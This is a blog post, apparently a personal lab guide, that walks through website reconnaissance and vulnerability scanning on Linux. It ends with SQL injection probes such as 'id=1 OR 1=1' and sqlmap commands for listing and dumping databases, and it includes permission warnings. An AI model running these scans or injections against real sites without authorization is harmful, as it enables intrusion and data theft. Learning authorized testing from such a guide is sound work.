Tuesday, 18 March 2025

Cybersecurity - Website Vulnerability check - Working on Linux - Lab

🔍 Phase 1: Basic Reconnaissance & Scanning (Legal & Passive Tools)

Here are some initial commands and techniques you can safely use to gather information.

1. Whois Lookup

whois website url (abc.co.in)

This reveals domain ownership details and can help find registrant info, DNS, emails, etc.

2. DNS Information

dig website url any

or

nslookup -type=any website url

This provides DNS records (A, MX, TXT, etc.), which can reveal mail servers and misconfigurations.

3. SSL/TLS Certificate Check

sslscan website url

or use an online tool like SSL Labs

4. Subdomain Enumeration

sublist3r -d website url

or

assetfinder --subs-only website url

Finds other domains owned by the institution.

5. WhatWeb / Wappalyzer

whatweb https://website url

Detects technologies used: web server, CMS, frameworks, etc.

6. Nikto Scan (light and legal)

 nikto -h https://website url

Scans for common vulnerabilities like outdated software, directory listings, etc.


⚠️ Phase 2: Deeper Scanning (Only With Explicit Permission)

These tools are more intrusive and should only be used with signed-off permission.

  • nmap with vulnerability scripts
  • wpscan (if WordPress)
  • gobuster or dirb for hidden directories
  • Manual testing for:
    • Open ports
    • Misconfigured headers
    • SQL injection
    • XSS

🛠️ TOOLS YOU'LL NEED (Set Up First)

Make sure these are installed in your Kali Linux / Parrot OS / Ubuntu system (or compatible OS):

Tool

Purpose

Install Command

nmap

Port scanning and service detection

sudo apt install nmap

whatweb

Technology fingerprinting

sudo apt install whatweb

nikto

Web server vulnerability scanner

sudo apt install nikto

sublist3r

Subdomain enumeration

sudo apt install sublist3r

dnsrecon

DNS recon and zone transfer

sudo apt install dnsrecon

theHarvester

Email/host enumeration

sudo apt install theharvester

sslscan

SSL/TLS analysis

sudo apt install sslscan


🧪 PHASE 1: RECON & INFORMATION GATHERING

1. 🔍 Get Domain Info (WHOIS)

 

 

whois Website URL

2. 🌐 Check DNS Records

 

 

dig Website URL any

or

 

 

dnsrecon -d Website URL

3. 🌍 Subdomain Enumeration

 

 

sublist3r -d Website URL

This may reveal staging environments, admin panels, etc.

4. 🧠 Identify Tech Stack

whatweb https://Website URL

Finds out if they’re using Apache, Nginx, PHP, WordPress, etc.


🔥 PHASE 2: VULNERABILITY SCANNING

5. 🚪 Scan for Open Ports & Services

nmap -sS -sV -T4 -Pn Website URL

Then try with scripts:

nmap -sV --script vuln Website URL

This uses known NSE scripts to find common vulnerabilities.

6. 🕷️ Web Vulnerability Scan

nikto -h https://Website URL

Looks for:

  • Outdated software
  • Misconfigurations
  • Dangerous files
  • Header issues

7. 🔐 SSL/TLS Security Check

sslscan Website URL

Or online via SSL Labs


🧾 PHASE 3: OPTIONAL OSINT

8. 📧 Emails & Public Data

theHarvester -d Website URL -b all


🧩 OPTIONAL: CMS-Specific Scan

If WhatWeb or Nmap reveals CMS (like WordPress):

wpscan --url https://Website URL/ --enumerate u,vp,vt



⚠️ Before You Start: Pre-Checks

Make sure the site has:

  • URL parameters like ?id=1, ?page=contact, etc.
  • Forms (login, search, feedback, etc.)

These are the typical injection points for SQLi.


🧪 1. Manual Testing (Quick Check in Browser)

Try injecting a ' into parameters and observe behavior:

https://Website URL/page.php?id=1'

  • If the site returns a DB error (like "You have an error in your SQL syntax"), that’s a red flag.
  • Try variations like:

https://Website URL/page.php?id=1 OR 1=1

https://Website URL/page.php?id=1'--

https://Website URL/page.php?id=1 AND 1=2


⚙️ 2. Use sqlmap – the Ultimate SQLi Tool

🔧 Install sqlmap

Already installed in Kali Linux, but if not:

sudo apt install sqlmap

🔍 Basic Command

sqlmap -u "https://Website URL/page.php?id=1" --batch --level=3 --risk=2

🔍 Form Testing (Interactive Forms)

sqlmap -u "https://Website URL/login.php" --forms --batch --level=3 --risk=3

🔎 Crawl & Test Entire Site

sqlmap -u "https://Website URL" --crawl=3 --batch --level=3 --risk=3


💡 Useful sqlmap Options

Option

Purpose

--dbs

List databases

--tables -D [dbname]

List tables in a DB

--columns -T [table] -D [dbname]

Get columns

--dump

Dump data from a table

--cookie="PHPSESSID=abc123"

Use session cookies

--auth-type & --auth-cred

If HTTP login required

Example:

sqlmap -u "https://Website URL/news.php?id=2" --dbs


🛑 WARNING

  • Never use --dump or extract actual data without written permission.
  • Keep tests at lower --risk and --level unless specifically asked to go deeper.
  • Use --batch to skip prompts if you're scripting.

 

No comments:

Post a Comment